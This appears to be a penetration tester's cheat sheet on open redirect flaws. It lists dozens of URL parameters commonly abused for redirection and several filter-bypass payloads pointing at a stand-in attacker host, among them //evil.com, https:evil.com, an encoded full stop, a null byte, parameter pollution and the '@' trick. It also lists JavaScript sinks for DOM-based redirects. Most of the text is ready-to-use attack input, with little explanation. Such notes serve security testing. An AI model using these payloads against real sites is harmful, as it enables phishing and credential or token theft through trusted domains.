Notes

Open redirect

Exploit

Section titled “Exploit”

Common injection parameters

Section titled “Common injection parameters”
/
?next
?url
?target
?rurl
?dest
?destination
?redir
?redirect_uri
?redirect_url
?redirect
/redirect/
/cgi-bin/redirect.cgi?
/out/
/out?
?view
/login?to
?image_url
?go
?return
?returnTo
?return_to
?checkout_url
?continue
?return_path
success
data
qurl
login
logout
ext
clickurl
goto
rit_url
forward_url
@https://
forward
pic
callback_url
jump
jump_url
click?u
originUrl
origin
Url
desturl
u
page
u1
action
action_url
Redirect
sp_url
service
recurl
j?url
url//
uri
u
allinurl:
q
link
src
tc?src
linkAddress
location
burl
request
backurl
RedirectUrl
Redirect
ReturnUrl

Bypass blacklist

Section titled “Bypass blacklist”

http blacklist bypass:

//evil.com

// blacklist bypass:

https:evil.com

Using // to bypass // blacklisted keyword (Browsers see // as //)

\/\/evil.com/
/\/evil.com/

Using / to bypass:

/\evil.com

URL encode Unicode full stop 。

//evil%E3%80%82com

Null byte

//evil%00.com

Parameter pollution

?next=whitelisted.com&next=evil.com

Using ”@” character, browser will redirect to anything after the ”@“

http://www.theirsite.com@evil.com/

DOM based

Section titled “DOM based”

View the page source. Common sink for open redirect:

location
location.host
location.hostname
location.href
location.pathname
location.search
location.protocol
location.assign()
location.replace()
open()
element.srcdoc
XMLHttpRequest.open()
XMLHttpRequest.send()
jQuery.ajax()
$.ajax()